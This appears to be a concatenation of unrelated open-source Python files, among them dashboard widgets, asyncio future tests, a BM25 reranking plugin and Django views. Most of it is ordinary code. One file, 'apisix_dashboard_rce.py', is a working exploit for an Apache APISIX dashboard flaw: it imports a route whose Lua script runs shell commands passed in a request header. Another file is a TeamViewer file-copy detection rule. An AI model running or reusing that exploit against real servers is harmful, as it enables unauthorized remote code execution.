Widget in the navbar of the cuxfilter dashboard.
Type: data_size_indicator
Parameters
----------
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
plot = DataSizeIndicator(
title="Datapoints Selected", widget=True, **library_specific_params
)
plot.chart_type = "datasize_indicator"
return plot
def number(
x=None,
expression=None,
aggregate_fn="mean",
title="",
widget=True,
format="{value}",
colors=[],
font_size="18pt",
**library_specific_params,
):
"""
Number chart which can be located in either the main dashboard or
side navbar.
Type: number_chart or number_chart_widget
Parameters
----------
x: str
column name from gpu dataframe
expression:
string containing computable expression containing column names
e.g: "(x+y)/2" will result in number value = (df.x + df.y)/2
    aggregate_fn: {'count', 'mean', 'min', 'max', 'sum', 'std'}, default 'mean'
title: str,
chart title
widget: bool, default True
if widget is True, the chart gets placed on the side navbar,
else its placed in the main dashboard
format: str, default='{value}'
A formatter string which accepts a {value}.
colors: list
Color thresholds for the Number indicator,
specified as a tuple of the absolute thresholds and the color to
switch to.
e,g: colors=[(33, 'green'), (66, 'gold'), (100, 'red')]
font_size: str, default '18pt'
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
if not (x or expression):
raise ArgumentError(
"Atleast one of x or expression arg should be provided"
)
plot = NumberChart(
x,
expression,
aggregate_fn,
title,
widget,
format,
colors,
font_size,
**library_specific_params,
)
return plot
def card(content="", title="", widget=True, **library_specific_params):
"""
    Card chart containing markdown content; it can be located in either
    the main dashboard or the side navbar.
    Type: card or card_widget
Parameters
----------
content: {str, markdown static content}, default ""
title: str,
chart title
widget: bool, default True
if widget is True, the chart gets placed on the side navbar,
else its placed in the main dashboard
**params:
additional arguments to be passed to the function. See panel
documentation for more info
"""
return Card(content, title, widget, **library_specific_params)
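# A minimal usage sketch (hypothetical column names; the dashboard wiring is
# assumed to follow the cuxfilter pattern of passing widgets via the sidebar):
#
#     import cuxfilter
#     cux_df = cuxfilter.DataFrame.from_dataframe(gpu_df)
#     sidebar = [range_slider("fare"), drop_down("passenger_count")]
#     d = cux_df.dashboard(charts=[], sidebar=sidebar)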
|
pyxb/bundles/opengis/misc/xAL.py
|
eLBati/pyxb
| 123 |
116320
|
from pyxb.bundles.opengis.misc.raw.xAL import *
|
Training/MOOC Tensorflow 2.0/BeiDa/class1/p22_random.uniform.py
|
church06/Pythons
| 177 |
116321
|
import tensorflow as tf
f = tf.random.uniform([2, 2], minval=0, maxval=1)
print("f:", f)
|
sequana/resources/data/__init__.py
|
vladsaveliev/sequana
| 138 |
116329
|
<reponame>vladsaveliev/sequana
"""
Some useful data sets to be used in the analysis
The command :func:`sequana.sequana_data` may be used to retrieved data from
this package. For example, a small but standard reference (phix) is used in
some NGS experiments. The file is small enough that it is provided within
sequana and its filename (full path) can be retrieved as follows::
from sequana import sequana_data
fullpath = sequana_data("phiX174.fa", "data")
Other files stored in this directory will be documented here.
"""
#: List of adapters used in various sequencing platforms
adapters = {
"adapters_netflex_pcr_free_1_fwd": "adapters_netflex_pcr_free_1_fwd.fa",
"adapters_netflex_pcr_free_1_rev": "adapters_netflex_pcr_free_1_rev.fa"
}
|
Calibration/TkAlCaRecoProducers/python/ALCARECOPromptCalibProdSiStrip_cff.py
|
ckamtsikis/cmssw
| 852 |
116339
|
<reponame>ckamtsikis/cmssw
import FWCore.ParameterSet.Config as cms
import HLTrigger.HLTfilters.hltHighLevel_cfi
ALCARECOPromptCalibProdSiStripHLT = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone(
andOr = True, ## choose logical OR between Triggerbits
eventSetupPathsKey = 'PromptCalibProdSiStrip',
throw = False # tolerate triggers stated above, but not available
)
seqALCARECOPromptCalibProdSiStrip = cms.Sequence(ALCARECOPromptCalibProdSiStripHLT)
|
textbox/evaluator/abstract_evaluator.py
|
StevenTang1998/TextBox
| 347 |
116379
|
# @Time : 2020/11/14
# @Author : <NAME>, <NAME>
# @Email : <EMAIL>
# UPDATE
# @Time : 2021/4/12
# @Author : <NAME>
# @Email : <EMAIL>
"""
textbox.evaluator.abstract_evaluator
#####################################
"""
import numpy as np
class AbstractEvaluator(object):
""":class:`AbstractEvaluator` is an abstract object which supports
the evaluation of the model. It is called by :class:`Trainer`.
Note:
        If you want to inherit this class and implement your own evaluator class,
you must implement the following functions.
Args:
config (Config): The config of evaluator.
"""
def evaluate(self, generate_corpus, reference_corpus):
r"""get metrics result
Args:
generate_corpus: the generated corpus
reference_corpus: the referenced corpus
Returns:
dict: such as ``{metric-1: xxx}``
"""
# get metrics
metric_dict = {}
info_dict = self._calc_metrics_info(generate_corpus=generate_corpus, reference_corpus=reference_corpus)
for key in info_dict:
tp_list = info_dict[key]
tp_val = np.mean(tp_list)
metric_dict[key] = round(tp_val, 4)
return metric_dict
    def _calc_metrics_info(self, generate_corpus, reference_corpus):
""" to calculate the metrics"""
raise NotImplementedError
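# A minimal illustrative subclass (not part of the original module): reports the
# average length ratio between generated and reference texts, following the
# dict-of-lists contract that evaluate() expects from _calc_metrics_info.
class LengthRatioEvaluator(AbstractEvaluator):
    def _calc_metrics_info(self, generate_corpus, reference_corpus):
        ratios = [
            len(gen) / max(len(ref), 1)
            for gen, ref in zip(generate_corpus, reference_corpus)
        ]
        return {'length-ratio': ratios}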
|
research/glue/model.py
|
legacyai/tf-transformers
| 116 |
116404
|
<reponame>legacyai/tf-transformers
from transformers import AlbertTokenizer
from tf_transformers.core import Trainer
from tf_transformers.models import AlbertModel as Model
from tf_transformers.optimization import create_optimizer
MODEL_NAME = "albert-base-v2"
def get_model(return_all_layer_outputs, is_training, use_dropout):
"""Get the model"""
model = Model.from_pretrained(
MODEL_NAME, return_all_layer_outputs=return_all_layer_outputs, is_training=is_training, use_dropout=use_dropout
)
return model
def get_tokenizer():
"""Get Tokenizer"""
return AlbertTokenizer.from_pretrained(MODEL_NAME)
def get_optimizer(learning_rate, examples, batch_size, epochs):
"""Get optimizer"""
steps_per_epoch = int(examples / batch_size)
num_train_steps = steps_per_epoch * epochs
warmup_steps = int(0.1 * num_train_steps)
def optimizer_fn():
optimizer, learning_rate_fn = create_optimizer(learning_rate, num_train_steps, warmup_steps)
return optimizer
return optimizer_fn
def get_trainer(distribution_strategy, num_gpus=0, tpu_address=None):
"""Get Trainer"""
trainer = Trainer(distribution_strategy, num_gpus=num_gpus, tpu_address=tpu_address)
return trainer
|
demos/app-server/apps/base.py
|
wecatch/app-turbo
| 157 |
116428
|
<filename>demos/app-server/apps/base.py<gh_stars>100-1000
# -*- coding:utf-8 -*-
from .settings import (
LANG as _LANG,
)
import turbo.app
from store import actions
class MixinHandler(turbo.app.BaseHandler):
pass
class BaseHandler(MixinHandler):
_session = None
def initialize(self):
super(BaseHandler, self).initialize()
self._params = self.parameter
self._skip = 0
self._limit = 0
def prepare(self):
super(BaseHandler, self).prepare()
self._skip = abs(self._params['skip']) if self._params.get(
'skip', None) else 0
self._limit = abs(self._params['limit']) if self._params.get(
'limit', None) else 20
actions.inc_qps()
|
py3nvml/__init__.py
|
m5imunovic/py3nvml
| 216 |
116446
|
<gh_stars>100-1000
from __future__ import absolute_import
from py3nvml import py3nvml
from py3nvml import nvidia_smi
from py3nvml.utils import grab_gpus, get_free_gpus, get_num_procs
__all__ = ['py3nvml', 'nvidia_smi', 'grab_gpus', 'get_free_gpus', 'get_num_procs']
__version__ = "0.2.6"
|
examples/context_eddystone_beacon.py
|
ddunmire/python-bleson
| 103 |
116460
|
#!/usr/bin/env python3
import sys
from time import sleep
from bleson import get_provider, EddystoneBeacon
# Get the wait time from the first script argument or default it to 10 seconds
WAIT_TIME = int(sys.argv[1]) if len(sys.argv)>1 else 10
with EddystoneBeacon(get_provider().get_adapter(), 'https://www.bluetooth.com/'):
sleep(WAIT_TIME)
|
filaments/teamviewer_remote_file_copy.py
|
Monkeyman21/fibratus
| 1,604 |
116461
|
# Copyright 2019-2020 by <NAME> (RabbitStack)
# All Rights Reserved.
# http://rabbitstack.github.io
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Identifies an executable or script file remotely downloaded via a TeamViewer transfer session
"""
from utils.dotdict import dotdictify
__author__ = '<NAME>'
__tags__ = ['Command and Control', 'TeamViewer']
__references__ = ['https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html']
__severity__ = 'medium'
__catalog__ = {
'framework': 'MITRE ATT&CK',
'technique_id': 'T1105',
'technique_name': 'Ingress Tool Transfer',
'technique_ref': 'https://attack.mitre.org/techniques/T1105/',
'tactic_id': 'TA0011',
'tactic_name': 'Command and Control',
'tactic_ref': 'https://attack.mitre.org/tactics/TA0011/'
}
extensions = [
'.exe',
'.dll',
'.scr',
'.com',
'.bar',
'.ps1',
'.vbs',
'.vbe',
'.js',
'.wsh',
'.hta'
]
def on_init():
kfilter("kevt.name = 'CreateFile' and ps.name = 'TeamViewer.exe' and file.operation = 'create' "
"and file.extension in (%s)"
% (', '.join([f'\'{ext}\'' for ext in extensions])))
@dotdictify
def on_next_kevent(kevent):
emit_alert(
f'Remote File Copy via TeamViewer',
f'TeamViewer downloaded an executable or script file {kevent.kparams.file_name} via transfer session',
severity=__severity__,
tags=[__tags__]
)
|
flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/model.py
|
ehoeffner/flaskerize
| 119 |
116484
|
<filename>flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/model.py
from sqlalchemy import Integer, Column, String
from app import db # noqa
from .interface import WidgetInterface
class Widget(db.Model): # type: ignore
"""A snazzy Widget"""
__tablename__ = "widget"
widget_id = Column(Integer(), primary_key=True)
name = Column(String(255))
purpose = Column(String(255))
def update(self, changes: WidgetInterface):
for key, val in changes.items():
setattr(self, key, val)
return self
|
devel/test_timeout.py
|
saidbakr/darkhttpd
| 788 |
116509
|
#!/usr/bin/env python3
# This is run by the "run-tests" script.
import unittest
import signal
import socket
class TestTimeout(unittest.TestCase):
def test_timeout(self):
port = 12346
s = socket.socket()
s.connect(("0.0.0.0", port))
# Assumes the server has --timeout 1
signal.alarm(3)
# Expect to get EOF before the alarm fires.
ret = s.recv(1024)
signal.alarm(0)
s.close()
self.assertEqual(ret, b'')
if __name__ == '__main__':
unittest.main()
# vim:set ts=4 sw=4 et:
|
src/holodeck/__init__.py
|
LaudateCorpus1/holodeck
| 518 |
116518
|
<reponame>LaudateCorpus1/holodeck<gh_stars>100-1000
"""Holodeck is a high fidelity simulator for reinforcement learning.
"""
__version__ = "0.3.2.dev0"
from holodeck.holodeck import make
from holodeck.packagemanager import *
__all__ = [
"agents",
"environments",
"exceptions",
"holodeck",
"make",
"packagemanager",
"sensors",
]
|
nboost/plugins/prerank.py
|
rajeshkp/nboost
| 646 |
116531
|
<reponame>rajeshkp/nboost
from nboost.plugins import Plugin
from nboost.delegates import ResponseDelegate
from nboost.database import DatabaseRow
import numpy as np
from multiprocessing import Pool, cpu_count
import math
from nltk.stem import PorterStemmer
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
import nltk
nltk.download('stopwords')
nltk.download('punkt')
class BM25:
def __init__(self, corpus, tokenizer=None):
self.corpus_size = len(corpus)
self.avgdl = 0
self.doc_freqs = []
self.idf = {}
self.doc_len = []
self.tokenizer = tokenizer
if tokenizer:
corpus = self._tokenize_corpus(corpus)
nd = self._initialize(corpus)
self._calc_idf(nd)
def _initialize(self, corpus):
nd = {} # word -> number of documents with word
num_doc = 0
for document in corpus:
self.doc_len.append(len(document))
num_doc += len(document)
frequencies = {}
for word in document:
if word not in frequencies:
frequencies[word] = 0
frequencies[word] += 1
self.doc_freqs.append(frequencies)
for word, freq in frequencies.items():
if word not in nd:
nd[word] = 0
nd[word] += 1
self.avgdl = num_doc / self.corpus_size
return nd
def _tokenize_corpus(self, corpus):
pool = Pool(cpu_count())
tokenized_corpus = pool.map(self.tokenizer, corpus)
return tokenized_corpus
def _calc_idf(self, nd):
raise NotImplementedError()
def get_scores(self, query):
raise NotImplementedError()
def get_top_n(self, query, documents, n=5):
assert self.corpus_size == len(documents), "The documents given don't match the index corpus!"
scores = self.get_scores(query)
top_n = np.argsort(scores)[::-1][:n]
return [documents[i] for i in top_n]
class BM25Okapi(BM25):
def __init__(self, corpus, tokenizer=None, k1=1.5, b=0.75, epsilon=0.25):
self.k1 = k1
self.b = b
self.epsilon = epsilon
super().__init__(corpus, tokenizer)
def _calc_idf(self, nd):
"""
Calculates frequencies of terms in documents and in corpus.
This algorithm sets a floor on the idf values to eps * average_idf
"""
# collect idf sum to calculate an average idf for epsilon value
idf_sum = 0
# collect words with negative idf to set them a special epsilon value.
# idf can be negative if word is contained in more than half of documents
negative_idfs = []
for word, freq in nd.items():
idf = math.log(self.corpus_size - freq + 0.5) - math.log(freq + 0.5)
self.idf[word] = idf
idf_sum += idf
if idf < 0:
negative_idfs.append(word)
self.average_idf = idf_sum / len(self.idf)
eps = self.epsilon * self.average_idf
for word in negative_idfs:
self.idf[word] = eps
def get_scores(self, query):
"""
The ATIRE BM25 variant uses an idf function which uses a log(idf) score. To prevent negative idf scores,
this algorithm also adds a floor to the idf value of epsilon.
See [<NAME>., <NAME>, <NAME>, Towards an Efficient and Effective Search Engine] for more info
:param query:
:return:
"""
score = np.zeros(self.corpus_size)
doc_len = np.array(self.doc_len)
for q in query:
q_freq = np.array([(doc.get(q) or 0) for doc in self.doc_freqs])
score += (self.idf.get(q) or 0) * (q_freq * (self.k1 + 1) /
(q_freq + self.k1 * (1 - self.b + self.b * doc_len / self.avgdl)))
return score
class PrerankPlugin(Plugin):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.ps = PorterStemmer()
def on_response(self, response: ResponseDelegate, db_row: DatabaseRow):
query = response.request.query
choices = response.cvalues
corpus = [self.tokenize(choice) for choice in choices]
bm25 = BM25Okapi(corpus)
ranks = np.argsort(bm25.get_scores(self.tokenize(query)))[::-1]
reranked_choices = [response.choices[rank] for rank in ranks]
response.choices = reranked_choices
response.choices = response.choices[:50]
def tokenize(self, paragraph):
words = [self.ps.stem(word) for word in word_tokenize(paragraph)]
filtered_words = [word for word in words if word not in stopwords.words('english')]
return filtered_words
def rank(self, query, choices):
pass
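if __name__ == "__main__":
    # Minimal sketch of the BM25 re-ranking idea used by PrerankPlugin, run on
    # a hand-tokenized toy corpus (uses only the BM25Okapi class defined above,
    # so no nboost server is required).
    toy_corpus = [
        ["the", "cat", "sat", "on", "the", "mat"],
        ["dogs", "chase", "cats"],
        ["bm25", "ranks", "documents", "by", "term", "frequency"],
    ]
    toy_bm25 = BM25Okapi(toy_corpus)
    print(toy_bm25.get_top_n(["cat"], toy_corpus, n=2))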
|
vimfiles/bundle/vim-python/submodules/pylint/tests/functional/r/redefine_loop.py
|
ciskoinch8/vimrc
| 463 |
116539
|
<gh_stars>100-1000
"""Test case for variable redefined in inner loop."""
for item in range(0, 5):
print("hello")
for item in range(5, 10): #[redefined-outer-name]
print(item)
print("yay")
print(item)
print("done")
|
tests/test_futures.py
|
PyO3/tokio
| 239 |
116550
|
<filename>tests/test_futures.py
# Copied from the uvloop project. If you add a new unittest here,
# please consider contributing it to the uvloop project.
#
# Portions copyright (c) 2015-present MagicStack Inc. http://magic.io
import asyncio
import concurrent.futures
import re
import sys
import threading
from asyncio import test_utils
from test import support
from unittest import mock
import pytest
@pytest.fixture
def make_callback():
# Create a callback function that appends thing to bag.
def _make_callback(bag, thing):
def bag_appender(future):
bag.append(thing)
return bag_appender
yield _make_callback
def _fakefunc(f):
return f
def first_cb():
pass
def last_cb():
pass
def test_future_initial_state(create_future):
f = create_future()
assert not f.cancelled()
assert not f.done()
f.cancel()
assert f.cancelled()
def test_future_cancel(create_future):
f = create_future()
assert f.cancel()
assert f.cancelled()
assert f.done()
with pytest.raises(asyncio.CancelledError):
f.result()
with pytest.raises(asyncio.CancelledError):
f.exception()
with pytest.raises(asyncio.InvalidStateError):
f.set_result(None)
with pytest.raises(asyncio.InvalidStateError):
f.set_exception(None)
assert not f.cancel()
def test_future_result(create_future):
f = create_future()
with pytest.raises(asyncio.InvalidStateError):
f.result()
f.set_result(42)
assert not f.cancelled()
assert f.done()
assert f.result() == 42
assert f.exception() is None
with pytest.raises(asyncio.InvalidStateError):
f.set_result(None)
with pytest.raises(asyncio.InvalidStateError):
f.set_exception(None)
assert not f.cancel()
def test_future_exception(create_future):
exc = RuntimeError()
f = create_future()
with pytest.raises(asyncio.InvalidStateError):
f.exception()
if sys.version_info[:3] > (3, 5, 1):
# StopIteration cannot be raised into a Future - CPython issue26221
with pytest.raises(TypeError) as excinfo:
f.set_exception(StopIteration)
excinfo.match("StopIteration .* cannot be raised")
f.set_exception(exc)
assert not f.cancelled()
assert f.done()
with pytest.raises(RuntimeError):
f.result()
assert f.exception() == exc
with pytest.raises(asyncio.InvalidStateError):
f.set_result(None)
with pytest.raises(asyncio.InvalidStateError):
f.set_exception(None)
assert not f.cancel()
def test_future_exception_class(create_future):
f = create_future()
f.set_exception(RuntimeError)
assert isinstance(f.exception(), RuntimeError)
def test_future_yield_from_twice(create_future):
f = create_future()
def fixture():
yield 'A'
x = yield from f
yield 'B', x
y = yield from f
yield 'C', y
g = fixture()
assert next(g) == 'A' # yield 'A'.
assert next(g) == f # First yield from f.
f.set_result(42)
assert next(g) == ('B', 42) # yield 'B', x.
# The second "yield from f" does not yield f.
assert next(g) == ('C', 42) # yield 'C', y.
@pytest.mark.skip
def test_future_repr(loop, match):
loop.set_debug(True)
f_pending_debug = loop.create_future()
frame = f_pending_debug._source_traceback[-1]
assert repr(f_pending_debug) == \
'<Future pending created at %s:%s>' % (frame[0], frame[1])
f_pending_debug.cancel()
loop.set_debug(False)
f_pending = loop.create_future()
assert repr(f_pending) == '<Future pending>'
f_pending.cancel()
f_cancelled = loop.create_future()
f_cancelled.cancel()
assert repr(f_cancelled) == '<Future cancelled>'
f_result = loop.create_future()
f_result.set_result(4)
assert repr(f_result) == '<Future finished result=4>'
assert f_result.result() == 4
exc = RuntimeError()
f_exception = loop.create_future()
f_exception.set_exception(exc)
assert repr(f_exception) == '<Future finished exception=RuntimeError()>'
assert f_exception.exception() is exc
def func_repr(func):
filename, lineno = test_utils.get_function_source(func)
text = '%s() at %s:%s' % (func.__qualname__, filename, lineno)
return re.escape(text)
f_one_callbacks = loop.create_future()
f_one_callbacks.add_done_callback(_fakefunc)
fake_repr = func_repr(_fakefunc)
assert match(repr(f_one_callbacks),
r'<Future pending cb=\[%s\]>' % fake_repr)
f_one_callbacks.cancel()
assert repr(f_one_callbacks) == '<Future cancelled>'
f_two_callbacks = loop.create_future()
f_two_callbacks.add_done_callback(first_cb)
f_two_callbacks.add_done_callback(last_cb)
first_repr = func_repr(first_cb)
last_repr = func_repr(last_cb)
assert match(repr(f_two_callbacks),
r'<Future pending cb=\[%s, %s\]>' % (first_repr, last_repr))
f_many_callbacks = loop.create_future()
f_many_callbacks.add_done_callback(first_cb)
for i in range(8):
f_many_callbacks.add_done_callback(_fakefunc)
f_many_callbacks.add_done_callback(last_cb)
cb_regex = r'%s, <8 more>, %s' % (first_repr, last_repr)
assert match(repr(f_many_callbacks),
r'<Future pending cb=\[%s\]>' % cb_regex)
f_many_callbacks.cancel()
assert repr(f_many_callbacks) == '<Future cancelled>'
@pytest.mark.skipif(sys.version_info[:3] < (3, 5, 1),
reason='old python version')
def test_future_copy_state(create_future):
from asyncio.futures import _copy_future_state
f = create_future()
f.set_result(10)
newf = create_future()
_copy_future_state(f, newf)
assert newf.done()
assert newf.result() == 10
f_exception = create_future()
f_exception.set_exception(RuntimeError())
newf_exception = create_future()
_copy_future_state(f_exception, newf_exception)
assert newf_exception.done()
with pytest.raises(RuntimeError):
newf_exception.result()
f_cancelled = create_future()
f_cancelled.cancel()
newf_cancelled = create_future()
_copy_future_state(f_cancelled, newf_cancelled)
assert newf_cancelled.cancelled()
def test_future_tb_logger_abandoned(create_future):
with mock.patch('asyncio.base_events.logger') as m_log:
fut = create_future()
del fut
assert not m_log.error.called
def test_future_tb_logger_result_unretrieved(create_future):
with mock.patch('asyncio.base_events.logger') as m_log:
fut = create_future()
fut.set_result(42)
del fut
assert not m_log.error.called
def test_future_wrap_future(loop):
def run(arg):
return (arg, threading.get_ident())
ex = concurrent.futures.ThreadPoolExecutor(1)
f1 = ex.submit(run, 'oi')
f2 = asyncio.wrap_future(f1, loop=loop)
res, ident = loop.run_until_complete(f2)
assert asyncio.isfuture(f2)
assert res == 'oi'
assert ident != threading.get_ident()
def test_future_wrap_future_future(create_future):
f1 = create_future()
f2 = asyncio.wrap_future(f1)
assert f1 is f2
def test_future_wrap_future_use_global_loop(loop):
with mock.patch('asyncio.futures.events') as events:
events.get_event_loop = lambda: loop
def run(arg):
return (arg, threading.get_ident())
ex = concurrent.futures.ThreadPoolExecutor(1)
f1 = ex.submit(run, 'oi')
f2 = asyncio.wrap_future(f1)
assert loop is f2._loop
def test_future_wrap_future_cancel(loop, run_briefly):
f1 = concurrent.futures.Future()
f2 = asyncio.wrap_future(f1, loop=loop)
f2.cancel()
run_briefly(loop)
assert f1.cancelled()
assert f2.cancelled()
def test_future_wrap_future_cancel2(loop, run_briefly):
f1 = concurrent.futures.Future()
f2 = asyncio.wrap_future(f1, loop=loop)
f1.set_result(42)
f2.cancel()
run_briefly(loop)
assert not f1.cancelled()
assert f1.result() == 42
assert f2.cancelled()
@pytest.mark.skip
def test_future_source_traceback(loop):
loop.set_debug(True)
future = loop.create_future()
lineno = sys._getframe().f_lineno - 1
assert isinstance(future._source_traceback, list)
assert future._source_traceback[-1][:3] == (
__file__, lineno, 'test_future_source_traceback')
@pytest.mark.parametrize('debug', [True, False])
def check_future_exception_never_retrieved(loop, debug, run_briefly):
last_ctx = None
def handler(loop, context):
nonlocal last_ctx
last_ctx = context
loop.set_debug(debug)
loop.set_exception_handler(handler)
def memory_error():
try:
raise MemoryError()
except BaseException as exc:
return exc
exc = memory_error()
future = loop.create_future()
if debug:
# source_traceback = future._source_traceback
future.set_exception(exc)
future = None
support.gc_collect()
run_briefly(loop)
assert last_ctx is not None
assert last_ctx['exception'] is exc
assert last_ctx['message'] == 'Future exception was never retrieved'
if debug:
tb = last_ctx['source_traceback']
assert tb[-2].name == 'check_future_exception_never_retrieved'
def test_future_wrap_future2(loop):
from uvloop.loop import _wrap_future
def run(arg):
return (arg, threading.get_ident())
ex = concurrent.futures.ThreadPoolExecutor(1)
f1 = ex.submit(run, 'oi')
f2 = _wrap_future(f1, loop=loop)
res, ident = loop.run_until_complete(f2)
assert asyncio.isfuture(f2)
assert res == 'oi'
assert ident != threading.get_ident()
def test_future_wrap_future_future3(create_future):
from uvloop.loop import _wrap_future
f1 = create_future()
f2 = _wrap_future(f1)
assert f1 is f2
def test_future_wrap_future_cancel4(loop, run_briefly):
from uvloop.loop import _wrap_future
f1 = concurrent.futures.Future()
f2 = _wrap_future(f1, loop=loop)
f2.cancel()
run_briefly(loop)
assert f1.cancelled()
assert f2.cancelled()
def test_future_wrap_future_cancel5(loop, run_briefly):
from uvloop.loop import _wrap_future
f1 = concurrent.futures.Future()
f2 = _wrap_future(f1, loop=loop)
f1.set_result(42)
f2.cancel()
run_briefly(loop)
assert not f1.cancelled()
assert f1.result() == 42
assert f2.cancelled()
def test_future_callbacks_invoked_on_set_result(
loop, create_future, make_callback, run_briefly):
bag = []
f = create_future()
f.add_done_callback(make_callback(bag, 42))
f.add_done_callback(make_callback(bag, 17))
assert bag == []
f.set_result('foo')
run_briefly(loop)
assert bag == [42, 17]
assert f.result() == 'foo'
def test_future_callbacks_invoked_on_set_exception(
loop, create_future, make_callback, run_briefly):
bag = []
f = create_future()
f.add_done_callback(make_callback(bag, 100))
assert bag == []
exc = RuntimeError()
f.set_exception(exc)
run_briefly(loop)
assert bag == [100]
assert f.exception() == exc
def test_future_remove_done_callback(
loop, create_future, make_callback, run_briefly):
bag = []
f = create_future()
cb1 = make_callback(bag, 1)
cb2 = make_callback(bag, 2)
cb3 = make_callback(bag, 3)
# Add one cb1 and one cb2.
f.add_done_callback(cb1)
f.add_done_callback(cb2)
# One instance of cb2 removed. Now there's only one cb1.
assert f.remove_done_callback(cb2) == 1
# Never had any cb3 in there.
assert f.remove_done_callback(cb3) == 0
# After this there will be 6 instances of cb1 and one of cb2.
f.add_done_callback(cb2)
for i in range(5):
f.add_done_callback(cb1)
# Remove all instances of cb1. One cb2 remains.
assert f.remove_done_callback(cb1) == 6
assert bag == []
f.set_result('foo')
run_briefly(loop)
assert bag == [2]
assert f.result() == 'foo'
|
2021/CVE-2021-45232/poc/others/apisix_dashboard_rce.py
|
hjyuan/reapoc
| 421 |
116552
|
#!/usr/bin/env python3
import zlib
import json
import random
import requests
import string
import sys
eval_config = {
    "Consumers": [],
"Routes": [
{
"id": str(random.randint(100000000000000000, 1000000000000000000)),
"create_time": 1640674554,
"update_time": 1640677637,
"uris": [
"/rce"
],
"name": "rce",
"methods": [
"GET",
"POST",
"PUT",
"DELETE",
"PATCH",
"HEAD",
"OPTIONS",
"CONNECT",
"TRACE"
],
"script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
"status": 1
}
],
"Services": [],
"SSLs": [],
"Upstreams": [],
"Scripts": [],
"GlobalPlugins": [],
"PluginConfigs": []
}
def random_str():
return ''.join(random.choices(string.ascii_letters + string.digits, k=6))
def calc_crc(data):
crc32 = zlib.crc32(data) & 0xffffffff
return crc32.to_bytes(4, byteorder="big")
def export_data(url):
r = requests.get(url + "/apisix/admin/migrate/export")
return r.text[:-4]
def import_data(url, data):
data = json.dumps(data).encode()
crc32 = calc_crc(data)
files = {"file": ("data", data + crc32, "text/data")}
resp = requests.post(url + "/apisix/admin/migrate/import", files=files)
# print(resp.text)
if resp.json().get("code", -1) == 0:
return True
else:
return False
if __name__ == "__main__":
if len(sys.argv) != 2:
print("python " + sys.argv[0] + " http://127.0.0.1:9000")
exit()
url = sys.argv[1]
if url.endswith("/"):
url = url[:-1]
uri = random_str()
eval_config["Routes"][0]["uris"] = [ "/" + uri]
eval_config["Routes"][0]["name"] = uri
if import_data(url, eval_config):
print("attack success")
print("uri is: " + "/" + uri)
else:
print("attack error")
|
apps/base/views/product_brand.py
|
youssriaboelseod/pyerp
| 115 |
116590
|
<reponame>youssriaboelseod/pyerp<filename>apps/base/views/product_brand.py
# Django Library
from django.contrib.auth.mixins import LoginRequiredMixin
from django.utils.translation import ugettext_lazy as _
# Localfolder Library
from ..models import PyProductBrand
from .web_father import (
FatherCreateView, FatherDeleteView, FatherDetailView, FatherListView,
FatherUpdateView)
OBJECT_LIST_FIELDS = [
{'string': _("Name"), 'field': 'name'},
]
OBJECT_FORM_FIELDS = ['name']
class ProductBrandListView(LoginRequiredMixin, FatherListView):
model = PyProductBrand
template_name = 'base/list.html'
extra_context = {'fields': OBJECT_LIST_FIELDS}
class ProductBrandDetailView(LoginRequiredMixin, FatherDetailView):
model = PyProductBrand
template_name = 'base/detail.html'
extra_context = {'fields': OBJECT_LIST_FIELDS}
class ProductBrandCreateView(LoginRequiredMixin, FatherCreateView):
model = PyProductBrand
fields = OBJECT_FORM_FIELDS
template_name = 'base/form.html'
class ProductBrandUpdateView(LoginRequiredMixin, FatherUpdateView):
model = PyProductBrand
fields = OBJECT_FORM_FIELDS
template_name = 'base/form.html'
class ProductBrandDeleteView(LoginRequiredMixin, FatherDeleteView):
model = PyProductBrand
|
sdk/storage/azure-storage-blob/tests/perfstress_tests/T1_legacy_tests/upload_block.py
|
rsdoherty/azure-sdk-for-python
| 2,728 |
116599
|
<reponame>rsdoherty/azure-sdk-for-python<filename>sdk/storage/azure-storage-blob/tests/perfstress_tests/T1_legacy_tests/upload_block.py<gh_stars>1000+
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import uuid
from azure_devtools.perfstress_tests import get_random_bytes
from ._test_base_legacy import _LegacyContainerTest
class LegacyUploadBlockTest(_LegacyContainerTest):
def __init__(self, arguments):
super().__init__(arguments)
self.blob_name = "blobblocktest-" + str(uuid.uuid4())
self.block_id = str(uuid.uuid4())
self.data = get_random_bytes(self.args.size)
def run_sync(self):
self.service_client.put_block(
container_name=self.container_name,
blob_name=self.blob_name,
block=self.data,
block_id=self.block_id)
async def run_async(self):
raise NotImplementedError("Async not supported for legacy T1 tests.")
|
angr/concretization_strategies/range.py
|
Kyle-Kyle/angr
| 6,132 |
116614
|
from . import SimConcretizationStrategy
class SimConcretizationStrategyRange(SimConcretizationStrategy):
"""
Concretization strategy that resolves addresses to a range.
"""
def __init__(self, limit, **kwargs): #pylint:disable=redefined-builtin
super(SimConcretizationStrategyRange, self).__init__(**kwargs)
self._limit = limit
def _concretize(self, memory, addr):
mn,mx = self._range(memory, addr)
if mx - mn <= self._limit:
return self._eval(memory, addr, self._limit)
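# Usage sketch (assumes a typical angr symbolic-memory setup; treat the exact
# attribute names as an assumption and check the angr docs for your version):
#
#   state.memory.read_strategies.insert(
#       0, SimConcretizationStrategyRange(limit=128))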
|
nnef_tools/io/nnef/helpers.py
|
dvorotnev/NNEF-Tools
| 193 |
116638
|
# Copyright (c) 2020 The Khronos Group Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
